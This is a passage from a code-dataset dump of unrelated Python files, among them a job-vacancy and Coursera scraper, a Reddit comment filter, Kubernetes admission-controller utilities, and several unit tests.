FadeIn(arr0_r), FadeIn(arr1_r), FadeIn(arr2_r), FadeIn(arr3_r))\r\n #self.play(Transform(t_group_tmp, t_group3))\r\n self.wait(1)\r\n\r\n self.play(Transform(t_group1, text_sum1))\r\n\r\n self.wait(2)\r\n\r\n self.play(FadeOut(a_group), FadeOut(af_group), FadeOut(t_group1))\r\n #这里需要注意,虽然经过了transform方法,但是实例化的对象还是���本身,只是样式改变了,所以需要使用原本名命\r\n self.wait(3)","sub_path":"SDRproj/SDR2/Part8.py","file_name":"Part8.py","file_ext":"py","file_size_in_byte":9524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"312096197","text":"# %%\n\n# !/usr/bin/env python\n# coding: utf-8\n\nimport requests\nimport pandas as pd\nimport numpy as np\nfrom bs4 import BeautifulSoup\nimport re\n\n# initializing lists with information about job\njobs_content = [] # list with page content about job\njobs_names = [] # list with names of the jobs\njobs_links = [] # list with links to the job page\nall_jobs_links = [] # list of all jobs links\n\n# job we want to take\njob = 'Веб-разработчик'\n\n# going through all pages at hh.ru site and collecting links that\n# refer to job variable and also get content from them\nfor page_number in range(2):\n # creating link for our job and current page\n jobs_page = 'https://spb.hh.ru/search/vacancy?area=2&st=searchVacancy&text=' + job.lower() + '&page=' + str(\n page_number)\n\n # getting current hh.ru page with our job\n page = requests.get(jobs_page, headers={'User-Agent': 'Custom'})\n\n # clearing jobs links list\n jobs_links.clear()\n\n # cheking if page is ready to\n # bring us some data, else getting error code\n if page.status_code == 200:\n # parsing page using Beautiful soup\n soup = BeautifulSoup(page.text, 'html.parser')\n\n # forming vacancies list from link that\n # refer to partucular vacancy\n vacancies_list = soup.find_all('a', {'class': 'bloko-link HH-LinkModifier'})\n\n # cheking if vacancies list is not empty\n # and if so, getting vacancy name\n # and vacancy link, then retrieve data from vacancy page\n if len(vacancies_list) > 0:\n # collecting links and names of vacancies\n for vacancy in vacancies_list:\n jobs_names.append(vacancy.text)\n if vacancy['href']:\n jobs_links.append(vacancy['href'])\n all_jobs_links.append(vacancy['href'])\n else:\n print('No job link')\n jobs_links.append(None)\n\n # getting page content for each vacancy\n for link in jobs_links:\n # getting vacancy page\n job_page = requests.get(link, headers={'User-Agent': 'Custom'})\n\n # checking if page is ready to\n # bring us some data, else getting error code\n if job_page.status_code == 200:\n # parsing vacancy page using Beautiful Soup\n job_soup = BeautifulSoup(job_page.text, 'html.parser')\n\n # getting vacancy page content\n page_content = job_soup.find('div', {'class': 'g-user-content'})\n\n # forming jobs content list\n jobs_content.append(page_content)\n else:\n print(\"Something wrong with the page: \", job_page.status_code)\n print('vacancy problem')\n else:\n print('No items in vacancies_list')\n else:\n print('Something wrong with page: ', page.status_code)\n print('GEneral page problem')\n\n# initializing list with all data about vacancies\ndata_list = []\n\n# going through jobs contents and splitting it\n# by . So we get all important headings\n# and will be able to get requesments, conditions\n# and responsibilities\nfor job_content in jobs_content:\n data_list.append(re.split('', str(job_content).lower()))\n\n# initializing lists with information about vacancy\njobs_treb = [] # list of vacancy requerments\njobs_usl = [] # list of vancy conditions\njobs_obyaz = [] # list of vacancy responsibilities\njobs_desc = [] # list of vacancy desctiption\n\n# going through splitted data and getting\n# requerments, conditions, responsibilities\n# and descriptions\nfor job in data_list:\n # getting descriptiong because\n # it is always first in the split\n jobs_desc.append(job[0])\n\n # initializing flags witch note if there is\n # one of requesments, conditions and responsibilities\n # in the split\n treb_flag = False\n obyaz_flag = False\n usl_flag = False\n\n # checking if there is one of three conditions\n # in our split and if so, adding this conditions\n # to corresponding lists\n for job_content in job:\n if job_content.startswith('требования'):\n jobs_treb.append(job_content)\n treb_flag = True\n\n if job_content.startswith('обязанности'):\n jobs_obyaz.append(job_content)\n obyaz_flag = True\n\n if job_content.startswith('условия'):\n jobs_usl.append(job_content)\n usl_flag = True\n\n # if we haven't found any conditions\n # we add None item to corresponding list\n if treb_flag == False:\n jobs_treb.append(None)\n\n if obyaz_flag == False:\n jobs_obyaz.append(None)\n\n if usl_flag == False:\n jobs_usl.append(None)\n\n# initializing lists with clean data about requerments, conditions\n# and responsibilities\nnew_jobs_treb = [] # list of vacancy requerments\nnew_jobs_obyaz = [] # list of vacancy responsibilities\nnew_jobs_usl = [] # list of vacancy conditions\n\n\n# Cleaning informations funcition\n# Arguments:\n# Data we want to clean and list where we want\n# . to put this data\n# . (data, data_list)\n# Returns:\n# . None\ndef clear_data(data, data_list):\n # going through the data and firstly cleaning\n # out of three possible conditions, then split\n # out data by html tags to form list or conditions\n # and cleanign data out of usless symbols\n for elem in data:\n if elem != None:\n # cleaning of three conditions\n item = re.sub('требования', '', elem)\n item2 = re.sub('к кандидату', '', item)\n item3 = re.sub('к кандидатам', '', item2)\n item4 = re.sub('условия', '', item3)\n item5 = re.sub('обязанности', '', item4)\n\n # splitting by html tags\n splited_items = re.split(r'<.*?>', item5)\n\n # initializing list with clean items\n cleared_items = []\n\n # going through splitted items, cleaning\n # them and adding to cleared items list\n for item in splited_items:\n cleared_items.append(re.sub(r'[^\\w\\d\\s]+', '', re.sub(r'\\s+', ' ', re.sub(r'<.*?>', '', item))))\n\n # deleating all empty items\n while (\"\" in cleared_items):\n cleared_items.remove(\"\")\n\n # deleating all space items\n while (\" \" in cleared_items):\n cleared_items.remove(\" \")\n\n # adding cleaned items to data_list\n data_list.append(cleared_items)\n else:\n # if no element in data, adding None\n data_list.append(None)\n\n\n# claning information\nclear_data(jobs_obyaz, new_jobs_obyaz)\nclear_data(jobs_usl, new_jobs_usl)\nclear_data(jobs_treb, new_jobs_treb)\n\n# initializing list for cleaned\n# description data\nnew_jobs_desc = []\n\n# going through all descriptions\n# and cleaning it\nfor desc in jobs_desc:\n # if something in descriotion, cleaning\n # it, overwise, adding None\n if desc != None:\n item = re.sub(r'[^\\w\\d\\s]+', '', re.sub(r'\\s+', ' ', re.sub(r'<.*?>', '', desc)))\n new_jobs_desc.append(item)\n else:\n new_jobs_desc.append(None)\n\n# forming DataFrame from retrieved data\nweb_data = pd.DataFrame({'description': new_jobs_desc, 'requerments': new_jobs_treb, 'conditions': new_jobs_usl,\n 'responsibilities': new_jobs_obyaz, 'links': all_jobs_links})\n\n# initializing lists of courses information\ncourses_links = [] # list of courses links\ncourses_skills = [] # list of courses skills\npage_links = [] # links to cources on current page\n\n# going through all pages of current job we want to take\n# and getting information about skilles we want to aquire\nfor page in range(1, 13):\n # forming link to courcera pages with job courses we want\n courses_link = 'https://www.coursera.org/search?query=web%20development&indices%5Bprod_all_products_term_optimization%5D%5Bpage%5D=' + str(\n page) + '&indices%5Bprod_all_products_term_optimization%5D%5Bconfigure%5D%5BclickAnalytics%5D=true&indices%5Bprod_all_products_term_optimization%5D%5Bconfigure%5D%5BruleContexts%5D%5B0%5D=ru&indices%5Bprod_all_products_term_optimization%5D%5Bconfigure%5D%5BhitsPerPage%5D=10&configure%5BclickAnalytics%5D=true'\n\n # getting current page\n page = requests.get(courses_link, headers={'User-Agent': 'Custom'})\n\n # cheking if page is ready to\n # bring us some data, else getting error code\n if page.status_code == 200:\n # parsing page using Beautiful Soup\n soup = BeautifulSoup(page.text, 'html.parser')\n\n # getting all courses links at current page\n courses_list = soup.find_all('a', {'data-click-key': 'search.search.click.search_card'})\n\n # checking if there are courses link on\n # the page and if so, adding links to links list\n # getting course page and retrieving skilles\n if len(courses_list) > 0:\n # clearing page links list\n page_links.clear()\n\n # going through courses and forming links\n for course in courses_list:\n # adding links to links list\n courses_links.append('https://www.coursera.org' + course['href'])\n page_links.append('https://www.coursera.org' + course['href'])\n\n # going through links and getting pages and skilles\n for link in page_links:\n # getting course page\n course_page = requests.get(link, headers={'User-Agent': 'Custom'})\n\n # cheking if page is ready to\n # bring us some data, else getting error code\n if course_page.status_code == 200:\n # parsing page using Beautiful Soup\n course_soup = BeautifulSoup(course_page.text, 'html.parser')\n\n # getting all acquired skilles from course page\n acquired_skilles = course_soup.find_all('div', {'class': 'Skills border-a p-x-2 p-t-1 p-b-2 m-y-2'})\n # adding skilles to skilles list\n courses_skills.append(acquired_skilles)\n else:\n print(\"Something wrong with page: \", course_page.status_code)\n courses_skills.append(None)\n print('Single cource problem')\n\n else:\n print('No items in courses_list')\n else:\n print('Something wrong with page: ', page.status_code)\n print('General cource problem')\n\n# initializing list of cleaned courses skilles\nnew_courses_skilles = []\n\n# going through all courses skills and\n# forming list of skills for each course\nfor course in courses_skills:\n # checking if something in courses list\n # and if so, getting it\n if course != None and len(course) > 0:\n # initializing list with skills\n # for current cource\n temp_skilles = []\n\n # getting all skilles for current course\n # forming temp_skilles list and adding it\n # to new_courses_skilles\n for skill in range(len(course[0].find_all('span', {'class': 'centerContent_dqfu5r'}))):\n temp_skilles.append(course[0].find_all('span', {'class': 'centerContent_dqfu5r'})[skill].text)\n new_courses_skilles.append(temp_skilles)\n else:\n new_courses_skilles.append(None)\n\n# getting data where requerments are not null\nweb_data_with_full_req = web_data[web_data['requerments'].notnull()]\n\n# setting to display all records in jupyter notebook\n# with a scrollbar\npd.set_option('display.max_columns', 150)\npd.set_option('display.width', 1000)\nweb_data_with_full_req\n\n# forming cources data with skilles and link to cources\ncources_data = pd.DataFrame({'skilles': new_courses_skilles, 'links': courses_links})\n\n# getting data where skills are not null\ncources_data_without_nones = cources_data[cources_data['skilles'].notnull()]\n\n\n# initializing list for new requerments\nnew_requerments = []\n\n# going through old requerments and extracting\n# only valuable information\nfor req in web_data_with_full_req['requerments']:\n # initializing temproary requerments list\n temp_req = []\n\n # going through single requerment and cleaning it\n for string in req:\n # cleaning requerments\n new_string = re.sub(r'[1-9]+', '', re.sub('ё', '', re.sub(r'\\s+', ' ', re.sub(r'[а-я]+', '', string))))\n new_s = re.sub(r'\\s+', ' ', new_string)\n\n # adding single requerment to temproary lsit\n temp_req.append(new_s)\n\n # adding temproary requerments list to\n # new requerments list\n new_requerments.append(temp_req)\n\n# deleating all space items\nfor item in new_requerments:\n while (\" \" in item):\n item.remove(\" \")\n\n# initializing requerments list\n# where all key words are splitted\nupdate_requerments = []\n\n# going through all requerments and\n# splitting them by space\nfor req in new_requerments:\n # initializing temproary list for single string\n temp = []\n\n # going through single string and splitting it\n # by space\n for i in req:\n splited_req = i.split()\n\n # adding splitted requerments to temp list\n temp.append(splited_req)\n\n # adding splitted items to updated requerments list\n update_requerments.append(temp)\n\nupdate_requerments\n\n# updating vacancies list with cleaned requerments\nweb_data_with_full_req['cleaned requerments'] = update_requerments\n\nweb_data_with_full_req\n\ncources_data_without_nones\n\n# initializing list for web development key words\nweb_development_keywords = []\n\n# going through requerments and forming keywords list\nfor cource_reqs in web_data_with_full_req['cleaned requerments']:\n for req in cource_reqs:\n for i in req:\n web_development_keywords.append(i)\n\n# going through skilles and forming keywords list\nfor cource_skilles in cources_data_without_nones['skilles']:\n for skill in cource_skilles:\n temp_words = skill.split()\n for i in temp_words:\n web_development_keywords.append(i)\n\n# initializing list for cleaned key words\nnew_web_development_keywords = []\n\n# cleaning key words\nfor word in web_development_keywords:\n new_word = re.sub('\\(', '', word)\n clered_word = re.sub('\\)', '', new_word)\n clered_word = re.sub('[\\+]+', '', clered_word)\n new_web_development_keywords.append(clered_word)\n\nnew_web_development_keywords\n\ndef get_cources(vacancy_link):\n # getting vacancy page\n job_page = requests.get(vacancy_link, headers={'User-Agent': 'Custom'})\n\n # checking if page is ready to\n # bring us some data, else getting error code\n if job_page.status_code == 200:\n # parsing vacancy page using Beautiful Soup\n job_soup = BeautifulSoup(job_page.text, 'html.parser')\n\n # getting vacancy page content\n page_content = job_soup.find('div', {'class': 'g-user-content'})\n\n # getting splitted page content\n splitted_page_content = re.split('', str(page_content).lower())\n\n # initializing flags witch note if\n # requerments in split\n treb_flag = False\n\n # initializing jobs requerments list\n job_requerments = []\n\n # checking if requerments in the list\n for job_content in splitted_page_content:\n if job_content.startswith('требования'):\n job_requerments.append(job_content)\n treb_flag = True\n\n # if requerments in vacancy, we simply get them\n # and find suitable cources\n if treb_flag != False:\n print('YES')\n item = re.sub('требования', '', job_requerments[0])\n item2 = re.sub('к кандидату', '', item)\n item3 = re.sub('к кандидатам', '', item2)\n\n # splitting by html tags\n splited_items = re.split(r'<.*?>', item3)\n\n # initializing list with clean items\n cleared_items = []\n\n # going through splitted items, cleaning\n # them and adding to cleared items list\n for item in splited_items:\n cleared_items.append(re.sub(r'[^\\w\\d\\s]+', '', re.sub(r'\\s+', ' ', re.sub(r'<.*?>', '', item))))\n\n # deleating all empty items\n while (\"\" in cleared_items):\n cleared_items.remove(\"\")\n\n # deleating all space items\n while (\" \" in cleared_items):\n cleared_items.remove(\" \")\n\n print(cleared_items)\n\n # initializing list for new requerments\n new_req = []\n\n # initializing temproary requerments list\n temp_req = []\n\n # going through single requerment and cleaning it\n for string in cleared_items:\n # cleaning requerments\n new_string = re.sub(r'[1-9]+', '', re.sub('ё', '', re.sub(r'\\s+', ' ', re.sub(r'[а-я]+', '', string))))\n new_s = re.sub(r'\\s+', ' ', new_string)\n\n # adding single requerment to temproary lsit\n temp_req.append(new_s)\n\n # adding temproary requerments list to\n # new requerments list\n new_req.append(temp_req)\n\n # deleating all space items\n for item in new_req:\n while (\" \" in item):\n item.remove(\" \")\n\n # initializing list with cleared requrments\n cleared_reqs = []\n\n for i in new_req[0]:\n temp_item = i.split()\n for j in temp_item:\n cleared_reqs.append(j)\n\n print(cleared_reqs)\n\n # initializing cources list\n cources_list = []\n\n # going through requerments and finding cources\n for req in cleared_reqs:\n for (cources_skilles, link) in \\\n zip(cources_data_without_nones['skilles'], cources_data_without_nones['links']):\n if re.search(req, (''.join(cources_skilles)).lower()):\n cources_list.append(link)\n\n return cources_list\n\n else:\n print('No requerments')\n # clearing vacancy data\n cleared_content = re.sub(r'[^\\w\\d\\s]+', '',\n re.sub(r'\\s+', ' ', re.sub(r'<.*?>', '', str(splitted_page_content))))\n\n # key words set\n key_words = set()\n\n # getting possibles requerments\n for word in new_web_development_keywords:\n if re.search(word, cleared_content):\n if len(word) < 3:\n continue\n else:\n key_words.add(word)\n\n print(key_words)\n\n # initializing cources list\n cources_list = []\n\n # going through requerments and finding cources\n for req in key_words:\n for (cources_skilles, link) in \\\n zip(cources_data_without_nones['skilles'], cources_data_without_nones['links']):\n if re.search(req, (''.join(cources_skilles)).lower()):\n cources_list.append(link)\n\n return cources_list\n else:\n print(\"Something wrong with the page: \", job_page.status_code)\n print('vacancy problem')\n\nlinks = get_cources(\n 'https://spb.hh.ru/vacancy/35471010?query=%D0%B2%D0%B5%D0%B1%20%D1%80%D0%B0%D0%B7%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%87%D0%B8%D0%BA')\n\nlinks\n\nlinks2 = get_cources(\n 'https://spb.hh.ru/vacancy/35564260?query=%D0%B2%D0%B5%D0%B1%20%D1%80%D0%B0%D0%B7%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%87%D0%B8%D0%BA')\n\nlinks2\n","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":19704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"412902976","text":"\nclass FileIO(object):\n '''\n General read/write of files\n '''\n def __init__(self, in_file=None, out_file=None, data=None):\n self.file = in_file\n self.out = out_file\n # self.fields = []\n self.data = data\n\n def write(self):\n if self.out is not None:\n with codecs.open(self.out, \"w\", encoding=\"utf-8\") as f:\n fieldnames = list(self.data_list[0].keys()) \n writer = csv.DictWriter(f, fieldnames=fieldnames, delimiter=DELIMITER) \n writer.writeheader() \n for event in self.data_list: \n writer.writerow(event) \n else:\n print(\"Output file is not specified - cannot write\", file=sys.stderr)\n \n def read(self, verbose=False):\n if self.file is not None:\n with codecs.open(self.file, \"r\", encoding=LOG_ENCODING) as f:\n i = 0\n li = []\n reader = csv.DictReader(f, delimiter=\" \")\n for row in reader:\n if verbose:\n i += 1 \n if i % 25 == 0:\n print(\"processed %s events\" % i)\n li.append(row)\n self.data = li\n else:\n print(\"Input file is not specified - cannot read\", file=sys.stderr)","sub_path":"fileIO.py","file_name":"fileIO.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"240464132","text":"from unittest.mock import MagicMock, patch\n\nfrom hummingbot.client.config.client_config_map import ClientConfigMap\nfrom hummingbot.client.config.config_helpers import ClientConfigAdapter\nfrom hummingbot.connector.exchange.eve.eve_exchange import EveExchange\nfrom hummingbot.connector.exchange.eve.eve_web_utils import EveURLCreator\nfrom hummingbot.connector.test_support.oms_exchange_connector_test import OMSExchangeTests\n\n\nclass EveExchangeTests(OMSExchangeTests.ExchangeTests):\n @classmethod\n def setUpClass(cls) -> None:\n super().setUpClass()\n cls._url_creator = EveURLCreator(\n rest_base_url=\"https://some.url\",\n ws_base_url=\"ws://some.url\",\n )\n\n @property\n def url_creator(self):\n return self._url_creator\n\n @patch(\"hummingbot.core.utils.tracking_nonce.NonceCreator._time\")\n def create_exchange_instance(self, time_mock: MagicMock, authenticated: bool = True) -> EveExchange:\n time_mock.return_value = self.time_mock\n client_config_map = ClientConfigAdapter(ClientConfigMap())\n exchange = EveExchange(\n client_config_map=client_config_map,\n eve_api_key=self.api_key,\n eve_secret_key=self.secret,\n eve_user_id=self.user_id,\n trading_pairs=[self.trading_pair],\n url_creator=self.url_creator,\n )\n if authenticated:\n self._initialize_auth(exchange.authenticator)\n return exchange\n","sub_path":"test/hummingbot/connector/exchange/eve/test_eve_exchange.py","file_name":"test_eve_exchange.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189575038","text":"import os\nimport base64\nimport re\nimport json\nimport yaml\nfrom jsonschema import validate, ValidationError, FormatChecker\nfrom connaisseur.exceptions import PathTraversalError\n\n\ndef safe_path_func(callback: callable, base_dir: str, path: str, *args, **kwargs):\n if os.path.commonprefix((os.path.realpath(path), base_dir)) != base_dir:\n msg = \"Potential path traversal in {path}.\"\n raise PathTraversalError(message=msg, path=path)\n return callback(path, *args, **kwargs)\n\n\ndef safe_json_open(base_dir: str, path: str):\n with safe_path_func(open, base_dir, path, \"r\") as file:\n return json.load(file)\n\n\ndef safe_yaml_open(base_dir: str, path: str):\n with safe_path_func(open, base_dir, path, \"r\") as file:\n return yaml.safe_load(file)\n\n\ndef get_admission_review(\n uid: str,\n allowed: bool,\n patch: list = None,\n msg: str = None,\n detection_mode: bool = False,\n):\n \"\"\"\n Get a standardized response object with patching instructions for the\n request and error message.\n\n Parameters\n ----------\n uid : str\n The uid of the request that was sent to the Admission Controller.\n allowed : bool\n The decision, whether the request will be accepted or denied.\n patch : list (optional)\n A list with JSON patch instruction, that will modify the original\n request, send to the Admission Controller. The list is Base64\n encoded.\n msg : str (optional)\n The error message, which will be displayed, should allowed be\n 'False'.\n detection_mode : bool (optional)\n If set to True, Connaisseur will admit images even if they fail\n validation, but will log a warning instead.\n\n Return\n ----------\n AdmissionReview : dict\n Response is an AdmissionReview with following structure:\n\n {\n \"apiVersion\": \"admission.k8s.io/v1beta1\",\n \"kind\": \"AdmissionReview\",\n \"response\": {\n \"uid\": uid,\n \"allowed\": allowed,\n \"status\": {\n \"code\": 200,\n \"message\": \"All gucci, my boi.\"\n },\n \"warnings\": [\"detection_mode ON\"]\n \"patchType\": \"JSONPatch\",\n \"patch\":\n \"W3sib3AiOiAiYWRkIiwgInBhdGgiOiAiL3NwZWMvcmVwbGljYXMiLCAidmFsdWUiOiAzfV0=\"\n }\n }\n \"\"\"\n _, minor, _ = get_kube_version()\n api = \"v1beta1\" if int(minor) < 17 else \"v1\"\n review = {\n \"apiVersion\": f\"admission.k8s.io/{api}\",\n \"kind\": \"AdmissionReview\",\n \"response\": {\n \"uid\": uid,\n \"allowed\": allowed or detection_mode,\n \"status\": {\"code\": 202 if allowed or detection_mode else 403},\n },\n }\n\n if msg:\n review[\"response\"][\"status\"][\"message\"] = msg\n if detection_mode and not allowed:\n review[\"response\"][\"warnings\"] = [msg]\n\n if patch:\n review[\"response\"][\"patchType\"] = \"JSONPatch\"\n review[\"response\"][\"patch\"] = base64.b64encode(\n bytearray(json.dumps(patch), \"utf-8\")\n ).decode(\"utf-8\")\n\n return review\n\n\ndef validate_schema(data: dict, schema_path: str, kind: str, exception):\n with open(schema_path, \"r\", encoding=\"utf-8\") as schema_file:\n schema = json.load(schema_file)\n\n try:\n validate(instance=data, schema=schema, format_checker=FormatChecker())\n except ValidationError as err:\n msg = \"{validation_kind} has an invalid format: {validation_err}.\"\n raise exception(\n message=msg,\n validation_kind=kind,\n validation_err=str(err),\n ) from err\n\n\ndef get_kube_version():\n \"\"\"\n Returns the kubernetes version.\n\n Return\n ----------\n (major, minor, patch): Tupel\n Major and minor version can always be assumed to be parseable as `int`s, the\n patch version could be arbitrary text.\n \"\"\"\n version = os.environ.get(\"KUBE_VERSION\", \"v0.0.0\") # e.g. `v1.20.0`\n regex = r\"v(\\d)\\.(\\d{1,2})\\.(.*)\"\n match = re.match(regex, version)\n return match.groups() if match else (\"0\", \"0\", \"0\")\n","sub_path":"connaisseur/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"286156329","text":"\"\"\"\n Copyright 2018 Globo.com\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nfrom setuptools import setup\n\nVERSION = __import__('globomap_plugin_zabbix').__version__\n\nsetup(\n name='globomap-plugin-zabbix',\n version=VERSION,\n description='Zabbix monitoring plugin on globomap-api',\n author='Storm',\n author_email='storm@corp.globo.com',\n url='https://gitlab.globoi.com/globomap/globomap-plugin-zabbix',\n packages=['globomap_plugin_zabbix'],\n package_data={'globomap_plugin_zabbix': ['*.py']},\n)\n","sub_path":"pypi_install_script/globomap-plugin-zabbix-0.1.6.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"30909867","text":"import json\nimport random\nimport sys\nfrom os import path\n\ndef p(jsonfile):\n with open(jsonfile) as d:\n x = 0\n for line in d:\n x += 1\n if x % 100000 == 0:\n print(x)\n print(x)\n\ndef process(json_file, prob=0.05):\n politics = [\"anarchism\", \"anarcho_capitalism\", \"antiwork\", \"breadtube\", \"chapotraphouse\", \"communism\", \"completeanarchy\", \"conservative\", \"cringeanarchy\", \"democraticsocialism\", \"esist\", \"fullcommunism\", \"goldandblack\", \"jordanpeterson\", \"keep_track\", \"latestagecapitalism\", \"latestagesocialism\", \"liberal\", \"libertarian\", \"neoliberal\", \"onguardforthee\", \"ourpresident\", \"political_revolution\", \"politicalhumor\", \"politics\", \"progressive\", \"republican\", \"sandersforpresident\", \"selfawarewolves\", \"socialism\", \"the_donald\", \"the_mueller\", \"thenewright\", \"voteblue\", \"wayofthebern\", \"yangforpresidenthq\"]\n sports = [\"baseball\", \"boxing\", \"cricket\", \"football\", \"golf\", \"hockey\", \"mma\", \"nba\", \"nfl\", \"nhl\", \"running\", \"soccer\", \"tennis\"]\n cities = [\"atlanta\", \"austin\", \"baltimore\", \"birmingham\", \"boston\", \"buffalo\", \"charlotte\", \"chicago\", \"cincinnati\", \"cleveland\", \"columbus\", \"dallas\", \"denver\", \"detroit\", \"hartford\", \"houston\", \"indianapolis\", \"jacksonville\", \"kansascity\", \"lasvegas\", \"losangeles\", \"louisville\", \"memphis\", \"miami\", \"milwaukee\", \"minneapolis\", \"nashville\", \"neworleans\", \"nyc\", \"okc\", \"orlando\", \"philadelphia\", \"phoenix\", \"pittsburgh\", \"portland\", \"providence\", \"raleigh\", \"richmond\", \"rochester\", \"sacramento\", \"saltlakecity\", \"sanantonio\", \"sandiego\", \"sanfrancisco\", \"sanjose\", \"stlouis\", \"tampa\", \"virginiabeach\", \"washingtondc\"]\n saved = {}\n with open(json_file) as data:\n line_num = 0\n for line in data:\n obj = json.loads(line)\n out = None\n subr = obj['subreddit'].lower()\n if subr in politics:\n out = \"politics.csv\"\n elif subr in sports:\n out = \"sports.csv\"\n elif subr in cities:\n out = \"cities.csv\"\n elif random.random() < prob:\n out = \"noise.csv\"\n if out != None and obj['author'] != \"[deleted]\":\n info = [\n obj['id'],\n subr,\n obj['created_utc'],\n obj['author'],\n obj['link_id'],\n obj['parent_id'],\n obj['score'],\n obj['body'].replace(\"\\n\", \" \").replace(\"\\r\", \"\").replace(\"\\t\", \" \")\n ]\n if out in saved:\n saved[out].append(info)\n if line_num % 10000 == 0:\n print(out, len(saved[out]), line_num)\n else:\n saved[out] = [info]\n line_num += 1\n for name in saved:\n header = not path.exists(name)\n with open(name, \"a\") as f:\n if header:\n f.write(\"id\\tsubreddit\\tcreated_utc\\tauthor\\tlink_id\\tparent_id\\tscore\\tbody\\n\")\n for e in saved[name]:\n f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(e[0],e[1],e[2],e[3],e[4],e[5],e[6],e[7]))\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n file_name = str(sys.argv[1])\n process(file_name)\n","sub_path":"reddit_json.py","file_name":"reddit_json.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"65296489","text":"# Copyright 2014 - Savoir-Faire Linux inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport copy\nimport json\n\n\nfrom surveil.tests.api import functionalTest\n\n\nclass TestMacroModulationController(functionalTest.FunctionalTest):\n\n def setUp(self):\n super(TestMacroModulationController, self).setUp()\n self.modulations = [\n {\n 'macromodulation_name': 'HighDuringNight',\n 'modulation_period': 'night',\n '_CRITICAL': 20,\n '_WARNING': 10,\n },\n {\n 'macromodulation_name': 'LowDuringNight',\n 'modulation_period': 'night',\n '_CRITICAL': 10,\n '_WARNING': 20,\n }\n ]\n self.mongoconnection.shinken.macromodulations.insert(\n copy.deepcopy(self.modulations)\n )\n\n def test_get_all_macromodulations(self):\n response = self.get('/v2/config/macromodulations')\n\n self.assert_count_equal_backport(\n [\n {\n 'macromodulation_name': 'HighDuringNight',\n 'modulation_period': 'night',\n 'macros': {\n '_CRITICAL': 20,\n '_WARNING': 10}},\n {\n 'macromodulation_name': 'LowDuringNight',\n 'modulation_period': 'night',\n 'macros': {\n '_CRITICAL': 10,\n '_WARNING': 20}}\n ],\n json.loads(response.body.decode())\n\n )\n self.assertEqual(response.status_int, 200)\n\n def test_get_one_macromodulation(self):\n response = self.get('/v2/config/macromodulations/HighDuringNight')\n\n self.assertEqual(\n json.loads(response.body.decode()),\n {'macromodulation_name': 'HighDuringNight',\n 'modulation_period': 'night',\n 'macros': {\n '_CRITICAL': 20,\n '_WARNING': 10}}\n )\n\n def test_create_macromodulation(self):\n m = {\n 'macromodulation_name': 'TEST_CREATE_MODULATION',\n 'modulation_period': 'night',\n 'macros': {\n '_CRITICAL': 10,\n '_WARNING': 20\n }\n }\n\n self.post_json('/v2/config/macromodulations', m)\n\n self.assertIsNotNone(\n self.mongoconnection.shinken.macromodulations.find_one(\n {\n 'macromodulation_name': 'TEST_CREATE_MODULATION',\n '_CRITICAL': 10,\n '_WARNING': 20\n }\n )\n )\n\n def test_delete_macromodulation(self):\n self.assertIsNotNone(\n self.mongoconnection.shinken.macromodulations.find_one(\n {\"macromodulation_name\": 'HighDuringNight'}\n )\n )\n\n self.delete('/v2/config/macromodulations/HighDuringNight')\n\n self.assertIsNone(\n self.mongoconnection.shinken.macromodulations.find_one(\n {\"macromodulation_name\": 'HighDuringNight'}\n )\n )\n\n def test_put_macromodulation(self):\n self.assertEqual(\n self.mongoconnection.shinken.macromodulations.find_one(\n {'macromodulation_name': 'HighDuringNight'}\n )['modulation_period'],\n 'night'\n )\n\n self.put_json(\n '/v2/config/macromodulations/HighDuringNight',\n {\"macromodulation_name\": \"HighDuringNight\",\n \"modulation_period\": \"TESTUPDATE\"}\n )\n\n self.assertEqual(\n self.mongoconnection.shinken.macromodulations.find_one(\n {'macromodulation_name': 'HighDuringNight'}\n )['modulation_period'],\n 'TESTUPDATE'\n )\n","sub_path":"surveil/tests/api/controllers/v2/config/test_macromodulations.py","file_name":"test_macromodulations.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"450013380","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom utilities.BasePopUp import BasePopUp\n\n\nclass TreeListPopUp(BasePopUp):\n expand_icon = (By.CSS_SELECTOR, 'span.k-icon.k-i-expand')\n nested_group = (By.CSS_SELECTOR, 'ul.k-group')\n\n def __init__(self, driver, name: str):\n super(TreeListPopUp, self).__init__(driver, name)\n self.list_rows = 